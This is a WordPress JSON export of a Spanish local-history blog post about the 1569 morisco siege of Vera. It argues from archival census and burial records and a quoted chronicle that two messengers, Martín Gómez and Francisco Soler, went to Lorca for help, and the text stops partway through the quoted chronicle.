{"id":228,"date":"2014-04-09T15:37:21","date_gmt":"2014-04-09T15:37:21","guid":{"rendered":"https:\/\/blog.vera.es\/cultura\/?p=228"},"modified":"2018-01-15T14:02:54","modified_gmt":"2018-01-15T14:02:54","slug":"1569-aben-humeya-socorro-a-lorca-no-fueron-tres-sino-dos-martin-gomez-y-francisco-soler","status":"publish","type":"post","link":"https:\/\/blog.vera.es\/cultura\/2014\/04\/09\/1569-aben-humeya-socorro-a-lorca-no-fueron-tres-sino-dos-martin-gomez-y-francisco-soler\/","title":{"rendered":"1569. AB\u00c9N HUMEYA. SOCORRO A LORCA. NO FUERON TRES, SINO DOS. MART\u00cdN G\u00d3MEZ GARRIDO Y FRANCISCO SOLER CAMPOY"},"content":{"rendered":"<p>La gente de a pie, ocupada en sus quehaceres y en sacar a sus familias adelante, la mayor\u00eda de las veces no tiene los medios, el tiempo libre, ni la informaci\u00f3n necesaria para contrastar los datos hist\u00f3ricos y comprender mejor la Historia de su pueblo. Una de nuestras labores es aclarar a los interesados estos datos, de entre los que encontramos que fueron tres los mensajeros veratenses que avisaron a Lorca del cerco de Vera por Ab\u00e9n Humeya y as\u00ed recibir ayuda. Veamos.<!--more--><\/p>\n<p align=\"justify\"><b>La Pragm\u00e1tica Sanci\u00f3n de 1567<\/b>, limitaci\u00f3n de los derechos de los <b>moriscos<\/b> (m<span style=\"color: #000000\"><span style=\"font-family: Times New Roman\"><span style=\"font-size: medium\">oros bautizados de los que quedaron en Espa\u00f1a despu\u00e9s de terminada la Reconquista<\/span><\/span><\/span>), desencaden\u00f3 en la navidad de 1568 su rebeli\u00f3n en Granada, al mando de <b>Hernando de V\u00e1lor<\/b> (Ab\u00e9n Humeya -Omeya-). A partir de marzo de 1569 deciden continuar, concibiendo como fundamental el control de un punto litoral, fijando su atenci\u00f3n en Vera (puerto de arribe de supuestas naves de Argel o Fez), ajena la Ciudad a esa intenci\u00f3n y perdiendo un tiempo precioso para reforzar su d\u00e9bil <b>muralla<\/b>. As\u00ed las cosas los moriscos la acorralaron jugando al despiste al centrar sus ataques en puntos cercanos del Valle del Almanzora. En septiembre veratenses y lorquinos rechazan a los monf\u00edes <span style=\"font-family: Times New Roman, serif\"><span style=\"font-size: medium\">(n<\/span><\/span><span style=\"color: #000000\"><span style=\"font-family: Times New Roman, serif\"><span style=\"font-size: medium\">ombre dado a los moros o moriscos que formaban cuadrillas de bandoleros en Andaluc\u00eda despu\u00e9s de la Reconquista) <\/span><\/span><\/span>en Zurgena y Guazamara, volviendo a poner a punto el sistema de atalayas.<\/p>\n<p align=\"justify\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/04\/aben-humeya-204x300.jpg\"><img fetchpriority=\"high\" decoding=\"async\" class=\"alignnone size-full wp-image-231\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/04\/aben-humeya-204x300.jpg\" alt=\"aben-humeya-204x300\" width=\"204\" height=\"300\" \/><\/a><\/p>\n<p align=\"justify\">A las ocho de la ma\u00f1ana del 25 de septiembre de 1569, Ab\u00e9n Humeya estaba frente a Vera, ya consider\u00e1ndola suya, haciendo una gran salva de arcabucer\u00eda desde el cerro de la <b>Vera Vieja<\/b>. El alcalde mayor de Vera respondi\u00f3 con escaramuzas. Los moriscos colocaron dos piezas de artiller\u00eda en el arrabal de la ciudad&#8230;<\/p>\n<p align=\"justify\">A partir de aqu\u00ed leamos las versiones de los hechos que nos interesan:<\/p>\n<p align=\"justify\"><b>1. ARCHIVO MUNICIPAL DE LORCA<\/b><\/p>\n<p align=\"justify\">En el <i><b>Informe del Cerco a Vera<\/b><\/i> (Archivo Municipal de Lorca, realizado ante el licenciado Marr\u00f3n de Alarc\u00f3n, Alcalde Mayor de Vera, por el escribano Juan de la Cadena, por testimonio de Francisco Gonz\u00e1lez, natural y vecino de Vera, y de Pedro de Ayora, jurado de Vera) se lee que la solicitud de ayuda a Lorca se realiz\u00f3 a las diez de la ma\u00f1ana por medio de un correo especial compuesto por dos escuderos, <b>Mart\u00edn G\u00f3mez<\/b> y <b>Francisco Soler<\/b>, vecinos de Vera, para que diesen aviso a Lorca y solicitar ayuda. A las doce del medio d\u00eda el sistema de atalayas facilitaron que Lorca ya supiese la acci\u00f3n de Humeya. Poco despu\u00e9s llegar\u00edan los dos valientes, habiendo recorrido nueve leguas. A las tres de la tarde se fij\u00f3 el alarde en Lorca (revista de soldados y armas). El d\u00eda 26 al alba llegaron a Vera 1000 hombres de a pie y 100 a caballo. Ab\u00e9n Humeya ya hab\u00eda levantado el cerco a Vera, huyendo hacia Cuevas e intentando cercar su castillo. Estos datos fueron investigados por Valeriano S\u00e1nchez Ramos.<\/p>\n<p align=\"justify\">Aprovechando las bases de datos de este Archivo Municipal que llevamos construyendo desde 2003, e investigando sobre estos personajes (Mart\u00edn G\u00f3mez y Francisco Soler), encontramos:<\/p>\n<p align=\"justify\"><b>2 1 4 Padrones de Habitantes de Vera<\/b><\/p>\n<table border=\"1\" width=\"643\" cellspacing=\"0\" cellpadding=\"2\" bgcolor=\"#ffffff\">\n<thead>\n<tr>\n<th bgcolor=\"#c0c0c0\" width=\"25\">\n<p align=\"justify\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\">A\u00d1O<\/span><\/span><\/span><\/p>\n<\/th>\n<th bgcolor=\"#c0c0c0\" width=\"40\">\n<p align=\"justify\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\">FOLIO N\u00ba REG<\/span><\/span><\/span><\/p>\n<\/th>\n<th bgcolor=\"#c0c0c0\" width=\"54\">\n<p align=\"justify\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\">CALLE<\/span><\/span><\/span><\/p>\n<\/th>\n<th bgcolor=\"#c0c0c0\" width=\"54\">\n<p align=\"justify\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\">N\u00ba FAMILIA\/CASA<\/span><\/span><\/span><\/p>\n<\/th>\n<th bgcolor=\"#c0c0c0\" width=\"52\">\n<p align=\"justify\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\">NOMBRE PILA<\/span><\/span><\/span><\/p>\n<\/th>\n<th bgcolor=\"#c0c0c0\" width=\"58\">\n<p align=\"justify\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\">1\u00ba APELLIDO<\/span><\/span><\/span><\/p>\n<\/th>\n<th bgcolor=\"#c0c0c0\" width=\"62\">\n<p align=\"justify\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\">2\u00ba APELLIDO \/ ALIAS<\/span><\/span><\/span><\/p>\n<\/th>\n<th bgcolor=\"#c0c0c0\" width=\"32\">\n<p align=\"justify\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\">EDAD<\/span><\/span><\/span><\/p>\n<\/th>\n<th bgcolor=\"#c0c0c0\" width=\"65\">\n<p align=\"justify\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\">PROFESI\u00d3N<\/span><\/span><\/span><\/p>\n<\/th>\n<th bgcolor=\"#c0c0c0\" width=\"100\">\n<p align=\"justify\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\">NOTAS SIGNOS<\/span><\/span><\/span><\/p>\n<\/th>\n<th bgcolor=\"#c0c0c0\" width=\"55\">\n<p align=\"justify\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\">CIVIL \/ MILITAR<\/span><\/span><\/span><\/p>\n<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr valign=\"top\">\n<td width=\"25\">\n<p align=\"justify\"><span style=\"color: #800080\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\"><b>1494<\/b><\/span><\/span><\/span><\/p>\n<\/td>\n<td width=\"40\"><\/td>\n<td width=\"54\"><\/td>\n<td width=\"54\"><\/td>\n<td width=\"52\">\n<p align=\"justify\"><span style=\"color: #800080\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\"><b>MART\u00cdN<\/b><\/span><\/span><\/span><\/p>\n<\/td>\n<td width=\"58\">\n<p align=\"justify\"><span style=\"color: #800080\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\"><b>G\u00d3MEZ<\/b><\/span><\/span><\/span><\/p>\n<\/td>\n<td width=\"62\"><\/td>\n<td width=\"32\"><\/td>\n<td width=\"65\">\n<p align=\"justify\"><span style=\"color: #800080\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\"><b>PEONES<\/b><\/span><\/span><\/span><\/p>\n<\/td>\n<td width=\"100\"><\/td>\n<td width=\"55\"><\/td>\n<\/tr>\n<tr valign=\"top\">\n<td width=\"25\">\n<p align=\"justify\"><span style=\"color: #800080\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\"><b>1588<\/b><\/span><\/span><\/span><\/p>\n<\/td>\n<td width=\"40\">\n<p align=\"justify\"><span style=\"color: #800080\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\"><b>04<\/b><\/span><\/span><\/span><\/p>\n<\/td>\n<td width=\"54\">\n<p align=\"justify\"><span style=\"color: #800080\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\"><b>PADR\u00d3N DE BULAS<\/b><\/span><\/span><\/span><\/p>\n<\/td>\n<td width=\"54\"><\/td>\n<td width=\"52\">\n<p align=\"justify\"><span style=\"color: #800080\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\"><b>MART\u00cdN<\/b><\/span><\/span><\/span><\/p>\n<\/td>\n<td width=\"58\">\n<p align=\"justify\"><span style=\"color: #800080\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\"><b>G\u00d3MEZ<\/b><\/span><\/span><\/span><\/p>\n<\/td>\n<td width=\"62\"><\/td>\n<td width=\"32\"><\/td>\n<td width=\"65\">\n<p align=\"justify\"><span style=\"color: #800080\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\"><b>JURADO<\/b><\/span><\/span><\/span><\/p>\n<\/td>\n<td width=\"100\">\n<p align=\"justify\"><span style=\"color: #800080\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\"><b>OTRA PARA MAR\u00cdA D\u00cdAZ, MUJER, JUAN G\u00d3MEZ DIFUNTO, CATALINA, DIFUNTA MADRE<\/b><\/span><\/span><\/span><\/p>\n<\/td>\n<td width=\"55\"><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p align=\"justify\"><b>2 1 4 Sepelios parroquia desde 1571<\/b><\/p>\n<table border=\"1\" width=\"643\" cellspacing=\"0\" cellpadding=\"2\" bgcolor=\"#ffffff\">\n<thead>\n<tr>\n<th bgcolor=\"#c0c0c0\" width=\"28\">\n<p align=\"justify\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\">A\u00d1O<\/span><\/span><\/span><\/p>\n<\/th>\n<th bgcolor=\"#c0c0c0\" width=\"73\">\n<p align=\"justify\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\">N\u00ba REGISTRO<\/span><\/span><\/span><\/p>\n<\/th>\n<th bgcolor=\"#c0c0c0\" width=\"100\">\n<p align=\"justify\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\">NOMBRE FALLECIDO<\/span><\/span><\/span><\/p>\n<\/th>\n<th bgcolor=\"#c0c0c0\" width=\"110\">\n<p align=\"justify\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\">1 APELLIDO FALLECIDO<\/span><\/span><\/span><\/p>\n<\/th>\n<th bgcolor=\"#c0c0c0\" width=\"110\">\n<p align=\"justify\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\">2 APELLIDO FALLECIDO<\/span><\/span><\/span><\/p>\n<\/th>\n<th bgcolor=\"#c0c0c0\" width=\"42\">\n<p align=\"justify\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\">CALLE<\/span><\/span><\/span><\/p>\n<\/th>\n<th bgcolor=\"#c0c0c0\" width=\"53\">\n<p align=\"justify\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\">NOTAS<\/span><\/span><\/span><\/p>\n<\/th>\n<th bgcolor=\"#c0c0c0\" width=\"93\">\n<p align=\"justify\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\">NOMBRE C\u00d3NYUGE<\/span><\/span><\/span><\/p>\n<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr valign=\"top\">\n<td width=\"28\">\n<p align=\"justify\"><span style=\"color: #000080\"><span style=\"font-family: Arial\"><span style=\"font-size: small\"><b>1593<\/b><\/span><\/span><\/span><\/p>\n<\/td>\n<td width=\"73\"><\/td>\n<td width=\"100\">\n<p align=\"justify\"><span style=\"color: #000080\"><span style=\"font-family: Arial\"><span style=\"font-size: small\"><b>MART\u00cdN<\/b><\/span><\/span><\/span><\/p>\n<\/td>\n<td width=\"110\">\n<p align=\"justify\"><span style=\"color: #000080\"><span style=\"font-family: Arial\"><span style=\"font-size: small\"><b>G\u00d3MEZ<\/b><\/span><\/span><\/span><\/p>\n<\/td>\n<td width=\"110\"><\/td>\n<td width=\"42\"><\/td>\n<td width=\"53\">\n<p align=\"justify\"><span style=\"color: #000080\"><span style=\"font-family: Arial\"><span style=\"font-size: small\"><b>JURADO<\/b><\/span><\/span><\/span><\/p>\n<\/td>\n<td width=\"93\"><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p align=\"justify\"><b>2 1 4 Padrones de Habitantes de Vera<\/b><\/p>\n<table border=\"1\" width=\"643\" cellspacing=\"0\" cellpadding=\"2\" bgcolor=\"#ffffff\">\n<thead>\n<tr>\n<th bgcolor=\"#c0c0c0\" width=\"25\">\n<p align=\"justify\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\">A\u00d1O<\/span><\/span><\/span><\/p>\n<\/th>\n<th bgcolor=\"#c0c0c0\" width=\"36\">\n<p align=\"justify\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\">FOLIO N\u00ba REG<\/span><\/span><\/span><\/p>\n<\/th>\n<th bgcolor=\"#c0c0c0\" width=\"92\">\n<p align=\"justify\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\">CALLE<\/span><\/span><\/span><\/p>\n<\/th>\n<th bgcolor=\"#c0c0c0\" width=\"49\">\n<p align=\"justify\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\">N\u00ba FAMILIA\/CASA<\/span><\/span><\/span><\/p>\n<\/th>\n<th bgcolor=\"#c0c0c0\" width=\"68\">\n<p align=\"justify\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\">NOMBRE PILA<\/span><\/span><\/span><\/p>\n<\/th>\n<th bgcolor=\"#c0c0c0\" width=\"57\">\n<p align=\"justify\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\">1\u00ba APELLIDO<\/span><\/span><\/span><\/p>\n<\/th>\n<th bgcolor=\"#c0c0c0\" width=\"61\">\n<p align=\"justify\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\">2\u00ba APELLIDO \/ ALIAS<\/span><\/span><\/span><\/p>\n<\/th>\n<th bgcolor=\"#c0c0c0\" width=\"32\">\n<p align=\"justify\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\">EDAD<\/span><\/span><\/span><\/p>\n<\/th>\n<th bgcolor=\"#c0c0c0\" width=\"65\">\n<p align=\"justify\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\">PROFESI\u00d3N<\/span><\/span><\/span><\/p>\n<\/th>\n<th bgcolor=\"#c0c0c0\" width=\"117\">\n<p align=\"justify\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\">NOTAS SIGNOS<\/span><\/span><\/span><\/p>\n<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr valign=\"top\">\n<td width=\"25\">\n<p align=\"justify\"><span style=\"color: #800080\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\"><b>1494<\/b><\/span><\/span><\/span><\/p>\n<\/td>\n<td width=\"36\"><\/td>\n<td width=\"92\"><\/td>\n<td width=\"49\"><\/td>\n<td width=\"68\">\n<p align=\"justify\"><span style=\"color: #800080\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\"><b>FRANCISCO<\/b><\/span><\/span><\/span><\/p>\n<\/td>\n<td width=\"57\">\n<p align=\"justify\"><span style=\"color: #800080\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\"><b>SOLER HIJO DE<\/b><\/span><\/span><\/span><\/p>\n<\/td>\n<td width=\"61\"><\/td>\n<td width=\"32\"><\/td>\n<td width=\"65\">\n<p align=\"justify\"><span style=\"color: #800080\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\"><b>PEONES<\/b><\/span><\/span><\/span><\/p>\n<\/td>\n<td width=\"117\"><\/td>\n<\/tr>\n<tr valign=\"top\">\n<td width=\"25\">\n<p align=\"justify\"><span style=\"color: #800080\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\"><b>1494<\/b><\/span><\/span><\/span><\/p>\n<\/td>\n<td width=\"36\"><\/td>\n<td width=\"92\"><\/td>\n<td width=\"49\"><\/td>\n<td width=\"68\">\n<p align=\"justify\"><span style=\"color: #800080\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\"><b>FRANCISCO<\/b><\/span><\/span><\/span><\/p>\n<\/td>\n<td width=\"57\">\n<p align=\"justify\"><span style=\"color: #800080\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\"><b>SOLER PADRE<\/b><\/span><\/span><\/span><\/p>\n<\/td>\n<td width=\"61\"><\/td>\n<td width=\"32\"><\/td>\n<td width=\"65\">\n<p align=\"justify\"><span style=\"color: #800080\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\"><b>PEONES<\/b><\/span><\/span><\/span><\/p>\n<\/td>\n<td width=\"117\"><\/td>\n<\/tr>\n<tr valign=\"top\">\n<td width=\"25\">\n<p align=\"justify\"><span style=\"color: #800080\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\"><b>1506<\/b><\/span><\/span><\/span><\/p>\n<\/td>\n<td width=\"36\">\n<p align=\"justify\"><span style=\"color: #800080\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\"><b>1<\/b><\/span><\/span><\/span><\/p>\n<\/td>\n<td width=\"92\"><\/td>\n<td width=\"49\">\n<p align=\"justify\"><span style=\"color: #800080\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\"><b>50<\/b><\/span><\/span><\/span><\/p>\n<\/td>\n<td width=\"68\">\n<p align=\"justify\"><span style=\"color: #800080\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\"><b>FRANCISCO<\/b><\/span><\/span><\/span><\/p>\n<\/td>\n<td width=\"57\">\n<p align=\"justify\"><span style=\"color: #800080\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\"><b>SOLER<\/b><\/span><\/span><\/span><\/p>\n<\/td>\n<td width=\"61\"><\/td>\n<td width=\"32\">\n<p align=\"justify\"><span style=\"color: #800080\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\"><b>36<\/b><\/span><\/span><\/span><\/p>\n<\/td>\n<td width=\"65\"><\/td>\n<td width=\"117\"><\/td>\n<\/tr>\n<tr valign=\"top\">\n<td width=\"25\">\n<p align=\"justify\"><span style=\"color: #800080\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\"><b>1516<\/b><\/span><\/span><\/span><\/p>\n<\/td>\n<td width=\"36\"><\/td>\n<td width=\"92\">\n<p align=\"justify\"><span style=\"color: #800080\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\"><b>REPARTIMIENTO HATICO 1516-1517<\/b><\/span><\/span><\/span><\/p>\n<\/td>\n<td width=\"49\"><\/td>\n<td width=\"68\">\n<p align=\"justify\"><span style=\"color: #800080\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\"><b>FRANCISCO<\/b><\/span><\/span><\/span><\/p>\n<\/td>\n<td width=\"57\">\n<p align=\"justify\"><span style=\"color: #800080\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\"><b>SOLER<\/b><\/span><\/span><\/span><\/p>\n<\/td>\n<td width=\"61\"><\/td>\n<td width=\"32\"><\/td>\n<td width=\"65\"><\/td>\n<td width=\"117\">\n<p align=\"justify\"><span style=\"color: #800080\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\"><b>TUVO REPARTIMIENTO EN 1496<\/b><\/span><\/span><\/span><\/p>\n<\/td>\n<\/tr>\n<tr valign=\"top\">\n<td width=\"25\">\n<p align=\"justify\"><span style=\"color: #800080\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\"><b>1587<\/b><\/span><\/span><\/span><\/p>\n<\/td>\n<td width=\"36\">\n<p align=\"justify\"><span style=\"color: #800080\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\"><b>07<\/b><\/span><\/span><\/span><\/p>\n<\/td>\n<td width=\"92\"><\/td>\n<td width=\"49\">\n<p align=\"justify\"><span style=\"color: #800080\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\"><b>258<\/b><\/span><\/span><\/span><\/p>\n<\/td>\n<td width=\"68\">\n<p align=\"justify\"><span style=\"color: #800080\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\"><b>VIUDA DE FRANCISCO SOLER<\/b><\/span><\/span><\/span><\/p>\n<\/td>\n<td width=\"57\">\n<p align=\"justify\"><span style=\"color: #800080\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\"><b>SOLER<\/b><\/span><\/span><\/span><\/p>\n<\/td>\n<td width=\"61\"><\/td>\n<td width=\"32\"><\/td>\n<td width=\"65\"><\/td>\n<td width=\"117\"><\/td>\n<\/tr>\n<tr valign=\"top\">\n<td width=\"25\">\n<p align=\"justify\"><span style=\"color: #800080\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\"><b>1587<\/b><\/span><\/span><\/span><\/p>\n<\/td>\n<td width=\"36\">\n<p align=\"justify\"><span style=\"color: #800080\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\"><b>03<\/b><\/span><\/span><\/span><\/p>\n<\/td>\n<td width=\"92\"><\/td>\n<td width=\"49\">\n<p align=\"justify\"><span style=\"color: #800080\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\"><b>110<\/b><\/span><\/span><\/span><\/p>\n<\/td>\n<td width=\"68\">\n<p align=\"justify\"><span style=\"color: #800080\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\"><b>FRANCISCO<\/b><\/span><\/span><\/span><\/p>\n<\/td>\n<td width=\"57\">\n<p align=\"justify\"><span style=\"color: #800080\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\"><b>SOLER<\/b><\/span><\/span><\/span><\/p>\n<\/td>\n<td width=\"61\">\n<p align=\"justify\"><span style=\"color: #800080\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\"><b>BL\u00c1ZQUEZ<\/b><\/span><\/span><\/span><\/p>\n<\/td>\n<td width=\"32\"><\/td>\n<td width=\"65\"><\/td>\n<td width=\"117\">\n<p align=\"justify\"><span style=\"color: #800080\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\"><b>JUNTOS<\/b><\/span><\/span><\/span><\/p>\n<\/td>\n<\/tr>\n<tr valign=\"top\">\n<td width=\"25\">\n<p align=\"justify\"><span style=\"color: #800080\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\"><b>1588<\/b><\/span><\/span><\/span><\/p>\n<\/td>\n<td width=\"36\">\n<p align=\"justify\"><span style=\"color: #800080\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\"><b>03<\/b><\/span><\/span><\/span><\/p>\n<\/td>\n<td width=\"92\">\n<p align=\"justify\"><span style=\"color: #800080\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\"><b>PADR\u00d3N DE BULAS<\/b><\/span><\/span><\/span><\/p>\n<\/td>\n<td width=\"49\"><\/td>\n<td width=\"68\">\n<p align=\"justify\"><span style=\"color: #800080\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\"><b>FRANCISCO<\/b><\/span><\/span><\/span><\/p>\n<\/td>\n<td width=\"57\">\n<p align=\"justify\"><span style=\"color: #800080\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\"><b>SOLER<\/b><\/span><\/span><\/span><\/p>\n<\/td>\n<td width=\"61\"><\/td>\n<td width=\"32\"><\/td>\n<td width=\"65\">\n<p align=\"justify\"><span style=\"color: #800080\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\"><b>REGIDOR<\/b><\/span><\/span><\/span><\/p>\n<\/td>\n<td width=\"117\">\n<p align=\"justify\"><span style=\"color: #800080\"><span style=\"font-family: Arial\"><span style=\"font-size: xx-small\"><b>OTRA PARA ALONSO SOLER, MAR\u00cdA MARIANAS\u00c1NCHEZ? SU MUJER<\/b><\/span><\/span><\/span><\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p align=\"justify\"><b>2 1 4 Sepelios parroquia desde 1571<\/b><\/p>\n<table border=\"1\" width=\"643\" cellspacing=\"0\" cellpadding=\"2\" bgcolor=\"#ffffff\">\n<thead>\n<tr>\n<th bgcolor=\"#c0c0c0\" width=\"28\">\n<p align=\"justify\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\">A\u00d1O<\/span><\/span><\/span><\/p>\n<\/th>\n<th bgcolor=\"#c0c0c0\" width=\"79\">\n<p align=\"justify\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\">N\u00ba REGISTRO<\/span><\/span><\/span><\/p>\n<\/th>\n<th bgcolor=\"#c0c0c0\" width=\"122\">\n<p align=\"justify\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\">NOMBRE FALLECIDO<\/span><\/span><\/span><\/p>\n<\/th>\n<th bgcolor=\"#c0c0c0\" width=\"139\">\n<p align=\"justify\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\">1 APELLIDO FALLECIDO<\/span><\/span><\/span><\/p>\n<\/th>\n<th bgcolor=\"#c0c0c0\" width=\"139\">\n<p align=\"justify\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\">2 APELLIDO FALLECIDO<\/span><\/span><\/span><\/p>\n<\/th>\n<th bgcolor=\"#c0c0c0\" width=\"42\">\n<p align=\"justify\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\">CALLE<\/span><\/span><\/span><\/p>\n<\/th>\n<th bgcolor=\"#c0c0c0\" width=\"64\">\n<p align=\"justify\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\">NOTAS<\/span><\/span><\/span><\/p>\n<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr valign=\"top\">\n<td width=\"28\">\n<p align=\"justify\"><span style=\"color: #000080\"><span style=\"font-family: Arial\"><span style=\"font-size: small\"><b>1579<\/b><\/span><\/span><\/span><\/p>\n<\/td>\n<td width=\"79\"><\/td>\n<td width=\"122\">\n<p align=\"justify\"><span style=\"color: #000080\"><span style=\"font-family: Arial\"><span style=\"font-size: small\"><b>FRANCISCO<\/b><\/span><\/span><\/span><\/p>\n<\/td>\n<td width=\"139\">\n<p align=\"justify\"><span style=\"color: #000080\"><span style=\"font-family: Arial\"><span style=\"font-size: small\"><b>SOLER<\/b><\/span><\/span><\/span><\/p>\n<\/td>\n<td width=\"139\"><\/td>\n<td width=\"42\"><\/td>\n<td width=\"64\">\n<p align=\"justify\"><span style=\"color: #000080\"><span style=\"font-family: Arial\"><span style=\"font-size: small\"><b>28-01-1579<\/b><\/span><\/span><\/span><\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p align=\"justify\"><b>2. P\u00c9REZ DE HITA (1544-1619). LAS GUERRAS CIVILES DE GRANADA (parte II, cap. XIII).<\/b><\/p>\n<p align=\"justify\">Una fuente documental diferente sobre los mismos hechos es el libro de P\u00e9rez de Hita, <i>Las Guerras Civiles de Granada<\/i>. Copio el fragmento completo (p\u00e1g. 626):<\/p>\n<p align=\"justify\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/04\/gin\u00e9s-p\u00e9rez-de-hita.jpg\"><img decoding=\"async\" class=\"alignnone size-full wp-image-232\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/04\/gin\u00e9s-p\u00e9rez-de-hita.jpg\" alt=\"gin\u00e9s p\u00e9rez de hita\" width=\"170\" height=\"222\" \/><\/a><\/p>\n<p align=\"justify\">(\u2026) <i>Luego que lleg\u00f3 el moro, lo primero que hizo fue destruir la poca gente de guerra que ten\u00eda la ciudad, y con quince mil hombres que llevaba ponerla un poderoso sitio, desde un punto tan cercano a las murallas, que las balas de la arcabucer\u00eda alcanzaban de la una a la otra parte del pueblo. Puestos los de Vera encima de la muralla, tiraban arcabuzazos a sus enemigos y les hac\u00edan mucho da\u00f1o; por lo cual los moros derribaron varias 